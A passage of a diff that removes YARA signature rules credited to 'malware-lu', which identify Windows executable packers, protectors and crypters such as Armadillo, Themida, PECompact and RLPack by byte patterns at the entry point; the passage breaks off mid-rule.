-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NullsoftInstallSystemv20b2v20b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 0C 53 55 56 57 FF 15 ?? 70 40 00 8B 35 ?? 92 40 00 05 E8 03 00 00 89 44 24 14 B3 20 FF 15 2C 70 40 00 BF 00 04 00 00 68 ?? ?? ?? 00 57 FF 15 ?? ?? 40 00 57 FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtectorV10Dvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 CA 31 41 00 68 06 32 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule GardianAngel10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 8C C8 8E D8 8E C0 FC BF ?? ?? EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXpressorv12CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RSCsProcessPatcherv14
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 E1 01 00 00 80 38 22 75 13 80 38 00 74 2E 80 38 20 75 06 80 78 FF 22 74 18 40 EB ED 80 38 00 74 1B EB 19 40 80 78 FF 20 75 F9 80 38 00 74 0D EB 0B 40 80 38 00 74 05 80 38 22 74 00 8B F8 B8 04 60 40 00 68 00 20 40 00 C7 05 A2 20 40 00 44 00 00 00 68 92 }
-
-condition:
-		$a0
-}
-	
-	
-rule Armadillov190b1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 04 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov190b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 F0 C1 40 00 68 A4 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov190b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 08 E2 40 00 68 94 95 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualCASM
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Thinstall25xxJtit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
-	$a1 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B F1 7C 04 3B F2 7C 02 89 2E 83 C6 04 3B F7 7C E3 58 50 68 00 00 40 00 68 80 5A }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule hmimysPacker10hmimys
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 }
-
-condition:
-		$a0
-}
-	
-	
-rule ACProtectV20risco
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C3 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV112V114LZMA430ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 60 }
-
-condition:
-		$a0
-}
-	
-	
-rule JDPack
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 8B D5 81 ED ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 81 EA 06 ?? ?? ?? 89 95 ?? ?? ?? ?? 83 BD 45 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinv1304Cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ScObfuscatorSuperCRacker
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 33 C9 8B 1D ?? ?? ?? ?? 03 1D ?? ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D ?? ?? ?? ?? 75 E7 A1 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 61 FF 25 ?? ?? ?? ?? 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElock098SpecialBuildforgotheXer
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 99 D7 FF FF 00 00 00 ?? ?? ?? ?? AA ?? ?? 00 00 00 00 00 00 00 00 00 CA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01DEF10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02REALBasicAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov260c
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? ?? 68 F4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 F4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov260a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 94 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 B4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThemidaWinLicenseV10XV17XDLLOreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 ?? 89 48 01 61 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressor12CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NeoLitev10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 44 24 04 8D 54 24 FC 23 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 FF 25 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeBundlev30standardloader
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 60 BE 00 B0 42 00 8D BE 00 60 FD FF C7 87 B0 E4 02 00 31 3C 4B DF 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ProtectionPlusvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 60 29 C0 64 FF 30 E8 ?? ?? ?? ?? 5D 83 ED 3C 89 E8 89 A5 14 ?? ?? ?? 2B 85 1C ?? ?? ?? 89 85 1C ?? ?? ?? 8D 85 27 03 ?? ?? 50 8B ?? 85 C0 0F 85 C0 ?? ?? ?? 8D BD 5B 03 ?? ?? 8D B5 43 03 ?? ?? E8 DD ?? ?? ?? 89 85 1F 03 ?? ?? 6A 40 68 ?? 10 ?? ?? 8B 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptorV22Xsoftcompletecom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF E0 E8 04 00 00 00 FF FF FF FF 5E C3 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule ThinstallVirtualizationSuite30353043ThinstallCompany
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01CrunchPEHeuristicAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv120EngdulekxtBorlandC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEPACKv405v406
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 06 ?? ?? 8E C0 8B 0E ?? ?? 8B F9 4F 8B F7 FD F3 A4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PeStubOEPv1x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 33 C9 33 D2 B8 ?? ?? ?? 00 B9 FF }
-	$a1 = { E8 05 00 00 00 33 C0 40 48 C3 E8 05 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule EXEShieldv01bv03bv03SMoKE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEArmor049Hying
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 56 52 51 53 55 E8 15 01 00 00 32 ?? ?? 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv14x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PocketPCSHA
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 86 2F 96 2F A6 2F B6 2F 22 4F 43 68 53 6B 63 6A 73 69 F0 7F 0B D0 0B 40 09 00 09 D0 B3 65 A3 66 93 67 0B 40 83 64 03 64 04 D0 0B 40 09 00 10 7F 26 4F F6 6B F6 6A F6 69 0B 00 F6 68 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 22 4F F0 7F 0A D0 06 D4 06 D5 0B 40 09 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorV1451CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? 00 05 00 ?? ?? 00 A3 08 ?? ?? 00 A1 08 ?? ?? 00 B9 81 ?? ?? 00 2B 48 18 89 0D 0C ?? ?? 00 83 3D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Thinstall25
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A7 1A 00 00 B9 6C 1A 00 00 BA 20 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD EC 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SuckStopv111
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? ?? ?? BE ?? ?? B4 30 CD 21 EB ?? 9B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DEFv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 }
-	$a1 = { BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? 10 40 00 C3 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule UnnamedScrambler251Beta2252p0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 ?? 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? ?? 40 00 E8 ?? EA FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 BA ?? ?? 40 00 B8 ?? ?? 40 00 E8 63 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? ?? FF FF BA ?? ?? 40 00 8B C3 8B 0D ?? ?? 40 00 E8 ?? ?? FF FF C7 05 ?? ?? 40 00 0A 00 00 00 BB ?? ?? 40 00 BE ?? ?? 40 00 BF ?? ?? 40 00 B8 ?? ?? 40 00 BA 04 00 00 00 E8 ?? EB FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 0A F3 FF FF 89 03 83 3B 00 0F 84 F7 04 00 00 B8 ?? ?? 40 00 8B 16 E8 ?? E1 FF FF B8 ?? ?? 40 00 E8 ?? E0 FF FF 8B D0 8B 03 8B 0E E8 ?? ?? FF FF 8B C7 A3 ?? ?? 40 00 8D 55 EC 33 C0 E8 ?? D3 FF FF 8B 45 EC B9 ?? ?? 40 00 BA ?? ?? 40 00 E8 8B ED FF FF 3C 01 75 2B A1 }
-
-condition:
-		$a0
-}
-	
-	
-rule Crunchv40
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 18 00 00 00 8B C5 55 60 9C 2B 85 E9 06 00 00 89 85 E1 06 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivateEXEProtector18SetiSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 FF 31 F6 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02Armadillo300Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule hmimyssPEPack01hmimys
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5D 83 ED 05 6A 00 FF 95 E1 0E 00 00 89 85 85 0E 00 00 8B 58 3C 03 D8 81 C3 F8 00 00 00 80 AD 89 0E 00 00 01 89 9D 63 0F 00 00 8B 4B 0C 03 8D 85 0E 00 00 8B 53 08 80 BD 89 0E 00 00 00 75 0C 03 8D 91 0E 00 00 2B 95 91 0E 00 00 89 8D 57 0F 00 00 89 95 5B 0F 00 00 8B 5B 10 89 9D 5F 0F 00 00 8B 9D 5F 0F 00 00 8B 85 57 0F 00 00 53 50 E8 B7 0B 00 00 89 85 73 0F 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 95 E9 0E 00 00 89 85 6B 0F 00 00 6A 04 68 00 10 00 00 68 D8 7C 00 00 6A 00 FF 95 E9 0E 00 00 89 85 6F 0F 00 00 8D 85 67 0F 00 00 8B 9D 73 0F 00 00 8B 8D 6B 0F 00 00 8B 95 5B 0F 00 00 83 EA 0E 8B B5 57 0F 00 00 83 C6 0E 8B BD 6F 0F 00 00 50 53 51 52 56 68 D8 7C 00 00 57 E8 01 01 00 00 8B 9D 57 0F 00 00 8B 03 3C 01 75 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv146
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 60 12 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02XCR011Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 8B F0 33 DB 83 C3 01 83 C0 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEPACKLINKv360v364v365or50121
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 ?? ?? ?? 8E C0 8B ?? ?? ?? 8B ?? 4F 8B F7 FD F3 A4 50 B8 ?? ?? 50 CB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SpecialEXEPasswordProtectorv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptor15Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? ?? EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeJoiner10Yoda
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 E8 E2 02 00 00 83 F8 FF 0F 84 6D 02 00 00 A3 0C 12 40 00 8B D8 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 E3 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1E 12 40 00 FF 35 08 12 40 00 E8 C4 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV119DllaPlib043ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 89 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrypKeyV56XKenonicControlsLtd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 00 75 07 6A 00 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Safe20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 10 53 56 57 E8 C4 01 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule MicrosoftVisualCV80
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 14 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB 94 00 00 00 53 6A 00 8B ?? ?? ?? ?? ?? FF D7 50 FF ?? ?? ?? ?? ?? 8B F0 85 F6 75 0A 6A 12 E8 ?? ?? ?? ?? 59 EB 18 89 1E 56 FF ?? ?? ?? ?? ?? 56 85 C0 75 14 50 FF D7 50 FF ?? ?? ?? ?? ?? B8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MZ_Crypt10byBrainSt0rm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 25 14 40 00 8B BD 77 14 40 00 8B 8D 7F 14 40 00 EB 28 83 7F 1C 07 75 1E 8B 77 0C 03 B5 7B 14 40 00 33 C0 EB 0C 50 8A A5 83 14 40 00 30 26 58 40 46 3B 47 10 76 EF 83 C7 28 49 0B C9 75 D4 8B 85 73 14 40 00 89 44 24 1C 61 FF E0 }
-
-condition:
-		$a0
-}
-	
-	
-rule EPWv130
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 57 1E 56 55 52 51 53 50 2E 8C 06 08 00 8C C0 83 C0 10 2E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WindofCrypt10byDarkPressure
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 64 40 00 10 E8 28 EA FF FF 33 C0 55 68 CE 51 00 10 64 ?? ?? ?? ?? 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 F6 DB FF FF 8B 45 EC E8 12 E7 FF FF 50 E8 3C EA FF FF 8B D8 83 FB FF 0F 84 A6 00 00 00 6A 00 53 E8 41 EA FF FF 8B F0 81 EE 00 5E 00 00 6A 00 6A 00 68 00 5E 00 00 53 E8 52 EA FF FF B8 F4 97 00 10 8B D6 E8 2E E7 FF FF B8 F8 97 00 10 8B D6 E8 22 E7 FF FF 8B C6 E8 AB D8 FF FF 8B F8 6A 00 68 F0 97 00 10 56 A1 F4 97 00 10 50 53 E8 05 EA FF FF 53 E8 CF E9 FF FF B8 FC 97 00 10 BA E8 51 00 10 E8 74 EA FF FF A1 F4 97 00 10 85 C0 74 05 83 E8 04 8B 00 50 B9 F8 97 00 10 B8 FC 97 00 10 8B 15 F4 97 00 10 E8 D8 EA FF FF B8 FC 97 00 10 E8 5A EB FF FF 8B CE 8B 15 F8 97 00 10 8B C7 E8 EB E9 FF FF 8B C7 85 